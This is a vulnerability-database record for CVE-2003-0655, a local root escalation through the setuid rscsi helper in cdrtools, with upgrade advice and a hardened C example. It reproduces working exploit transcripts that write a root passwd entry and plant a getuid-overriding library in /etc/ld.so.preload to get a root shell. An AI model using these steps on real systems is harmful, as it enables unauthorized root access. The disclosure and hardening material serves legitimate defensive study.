ID OSVDB:6406 Type osvdb Reporter KF(dotslash@snosoft.com) Modified 2003-08-01T00:00:00
Description
Vulnerability Description
cdrtools contains a flaw that allows a local user to gain root privileges. The rscsi remote SCSI server helper is installed setuid root and takes the path of its debug log file as a command line argument; it opens and writes that file while still running as root, so whatever the caller feeds it on stdin is appended to any file the caller names, and a newly created file ends up root-owned but group-writable by the caller (the exploit transcript on this page targets /etc/ld.so.preload, the testing notes /etc/passwd). The result is an arbitrary file overwrite that hands a local attacker root: a complete loss of confidentiality, integrity and availability on the host.
Solution Description
Upgrade to version 2.01a18 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds. The escalation depends entirely on rscsi being installed setuid root (the default, and the reason for the suid keyword below), so until the upgrade is in place, ls -l /opt/schily/sbin/rscsi tells you whether a given host is exposed.
Short Description
rscsi in cdrtools, installed setuid root, opens the debug log file named on its command line with root privileges, letting a local user overwrite arbitrary files and gain root.
Manual Testing Notes
elguapo@gentoo elguapo $ echo C`echo -e "\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08r00t::0:0:root:/:/bin/bash\x0a"` | /opt/schily/sbin/rscsi /tmp/lala
Segmentation fault (this segfault is not related to the security issue)
elguapo@gentoo elguapo $ cat /tmp/lala
rscsid: user id 1000, name elguapo
rmt: stdin is a PIPE
r00t::0:0:root:/root:/bin/bash
When attempting to echo this line to the password file we get the following
error. Please note that the password file IS still overwritten at this point.
E0
Illegal user id for RSCSI server
0
elguapo@gentoo elguapo $ cat /etc/passwd
rscsid: Illegal user '(NULL POINTER)' id 1000 for RSCSI server
rscsid:>E 0 (Illegal user id for RSCSI server) []
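The flaw above is the classic setuid-helper mistake: a user-supplied path is opened while the effective uid is still 0, so the kernel's permission check is made on root's behalf. The C program below is an added example, not cdrtools code, that models the pattern and its fix. open_log_unsafe() does what the advisory describes (opens the argument path as whoever the process currently is); open_log_as_caller() drops to the caller's real uid and gid around the open, refuses symlinks with O_NOFOLLOW, and verifies via fstat that what it opened is a regular, single-link file owned by the caller. demo_symlink_rejected() creates a scratch target and a symlink to it under a directory you choose (constructed fixtures, removed afterwards) and returns 1 when the hardened open accepts the direct path but rejects the link, while the unsafe open follows it. The function names, the scratch file names and the directory argument are assumptions made for this illustration.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* The pattern the advisory describes (modelled here, not cdrtools' source):
 * a setuid-root helper opens the log path from argv while euid is still 0,
 * so any file root may write is created, truncated or appended for the caller. */
int open_log_unsafe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_APPEND, 0664);
}

/* Hardened version: do the open with the caller's real uid/gid in effect,
 * never follow a symlink, then verify what was actually opened. */
int open_log_as_caller(const char *path)
{
    uid_t ruid = getuid(), euid = geteuid();
    gid_t rgid = getgid(), egid = getegid();
    struct stat st;
    int fd, saved_errno;

    /* Drop the gid first: once the uid is non-zero the gid can no longer change.
     * In a plain (non-setuid) run these calls are no-ops. */
    if (setegid(rgid) != 0 || seteuid(ruid) != 0)
        return -1;

    fd = open(path, O_WRONLY | O_CREAT | O_APPEND | O_NOFOLLOW | O_CLOEXEC, 0644);
    saved_errno = errno;

    /* Regain the saved privileges for the real work; failing to do so is fatal. */
    if (seteuid(euid) != 0 || setegid(egid) != 0) {
        if (fd >= 0)
            close(fd);
        abort();
    }
    if (fd < 0) {
        errno = saved_errno;
        return -1;
    }

    /* Only a regular, single-link file owned by the caller is an acceptable log. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != ruid || st.st_nlink != 1) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Scenario: the caller names the log through a symlink, the way the exploit on
 * this page names /etc/ld.so.preload. A scratch target and a link to it are
 * created under dir (constructed fixtures, removed before returning).
 * Returns 1 when the hardened open accepts the direct path, rejects the link,
 * and the unsafe open follows the link; 0 otherwise; -1 on setup failure. */
int demo_symlink_rejected(const char *dir)
{
    char target[PATH_MAX], link[PATH_MAX + 8];
    int t, fd_direct, fd_link, fd_unsafe, ok;

    snprintf(target, sizeof target, "%s/rscsi_log_XXXXXX", dir);
    t = mkstemp(target);
    if (t < 0)
        return -1;
    close(t);
    snprintf(link, sizeof link, "%s.lnk", target);
    if (symlink(target, link) != 0) {
        unlink(target);
        return -1;
    }

    fd_direct = open_log_as_caller(target);
    fd_link   = open_log_as_caller(link);   /* ELOOP from O_NOFOLLOW */
    fd_unsafe = open_log_unsafe(link);      /* follows the link: the flaw */

    ok = fd_direct >= 0 && fd_link < 0 && fd_unsafe >= 0;
    if (fd_direct >= 0) close(fd_direct);
    if (fd_unsafe >= 0) close(fd_unsafe);
    unlink(link);
    unlink(target);
    return ok;
}

int main(int argc, char **argv)
{
    const char *dir = argc > 1 ? argv[1] : "/tmp";
    printf("symlink scenario in %s: %s\n", dir,
           demo_symlink_rejected(dir) == 1 ? "hardened open rejected the link"
                                           : "unexpected result");
    return 0;
}
```

Run as an ordinary user the identity-switching calls change nothing; installed setuid root they are what keeps a path such as /etc/ld.so.preload from being created on the caller's behalf, because the open is then checked against the caller's own permissions. The fstat check is the second line of defence: if a file could already be reached by a hard link or had been swapped between creation and use, its owner or link count would give it away. When the process really is root (ruid 0), the hardened open will still write /etc/passwd, which is correct: root running root's tool is not an escalation.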
References:
Vendor URL: http://www.fokus.fhg.de/research/cc/glone/employees/joerg.schilling/private/cdrecord.html
Security Tracker: 1007368
Mail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=105978381618095&w=2
Keyword: suid
ISS X-Force ID: 12802
CVE-2003-0655
Bugtraq ID: 8328
Record metadata
Title: cdrtools rscsi Privilege Escalation
Published: 2003-08-01, bulletin family: software
CVSS v2: AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE, score 7.2 (vulners score 6.7)
Affected software: cdrtools 1.0x, 1.10, 2.00, 2.00.3
Related entries: CVE-2003-0655, EDB-ID:22979, OSVDB:2359
https://vulners.com/osvdb/OSVDB:6406

Related entries

CVE-2003-0655 (NVD, published 2003-08-27, last modified 2016-10-18)
rscsi in cdrtools 2.01 and earlier allows local users to overwrite arbitrary files and gain root privileges by specifying the target file as a command line argument, which is modified while rscsi is running with privileges.
CVSS v2: AV:L/AC:L/Au:N/C:C/I:C/A:C, base score 7.2 (HIGH), exploitability 3.9, impact 10.0; obtains all privileges; no user interaction required. CWE: NVD-CWE-Other.
Affected CPEs: cpe:/a:cdrtools:cdrtools:2.0, cpe:/a:cdrtools:cdrtools:2.0.3
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0655

OSVDB:2359 cdrtools cdrecord rscsi Arbitrary File Overwrite Privilege Escalation (published 2003-08-01T23:04:23, CVSS 7.2)
Vulnerability Description
cdrecord in cdrtools contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The problem is that the rscsi helper binary is installed setuid root. By specifying the target file as a command line argument, a malicious user could overwrite arbitrary files to gain root privileges resulting in a loss of integrity.
Solution Description
Upgrade to version 2.01a18 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.
References:
Vendor URL: http://www.fokus.gmd.de/research/cc/glone/employees/joerg.schilling/private/cdrecord.html
Security Tracker: 1007368
Secunia Advisory ID: 9428 (https://secuniaresearch.flexerasoftware.com/advisories/9428/)
Other Advisory URL: http://marc.theaimsgroup.com/?l=bugtraq&m=105978381618095&w=2
ISS X-Force ID: 12802
CVE-2003-0655
Bugtraq ID: 8328
https://vulners.com/osvdb/OSVDB:2359

EDB-ID:22979 CDRTools 2.0 RSCSI Debug File Arbitrary Local File Manipulation Vulnerability (exploit-db, published 2003-08-01, local exploit for the linux platform, CVE-2003-0655)
https://www.exploit-db.com/exploits/22979/
source: http://www.securityfocus.com/bid/8328/info

It has been reported that the rscsi utility may provide for the modification of ownership and the corruption of arbitrary attacker specified files.

It has been reported that a local attacker may invoke the rscsi utility to corrupt or seize group ownership of an attacker specified file. Because the rscsi utility is installed with setuid 'root' permissions by default, a local attacker may harness this vulnerability to achieve elevated privileges.

$ echo C`echo -e "\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08r00t::0:0:root:/:/bin/bash\x0a"` | /opt/schily/sbin/rscsi /tmp/lala

[kf@vegeta kf]$ ls -al /etc/ld.so.preload
ls: /etc/ld.so.preload: No such file or directory
[kf@vegeta kf]$ cat > oops.c
int getuid(void)
{
return(0);
}
[kf@vegeta kf]$ gcc -c -o oops.o oops.c
[kf@vegeta kf]$ ld -shared -o oops.so oops.o
[kf@vegeta kf]$ ls -al oops.so
-rwxrwxr-x 1 kf kf 1714 Jul 30 18:53 oops.so
[kf@vegeta kf]$ echo duh_kf | /opt/schily/sbin/rscsi /etc/ld.so.preload
E0
Garbage command
0
-rw-rw-r-- 1 root kf 1 Jul 30 19:29 /etc/ld.so.preload
[kf@vegeta kf]$ echo /home/kf/oops.so > /etc/ld.so.preload
[kf@vegeta kf]$ su
[root@vegeta kf]# rm /etc/ld.so.preload
rm: remove regular file `/etc/ld.so.preload'? y
[root@vegeta kf]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)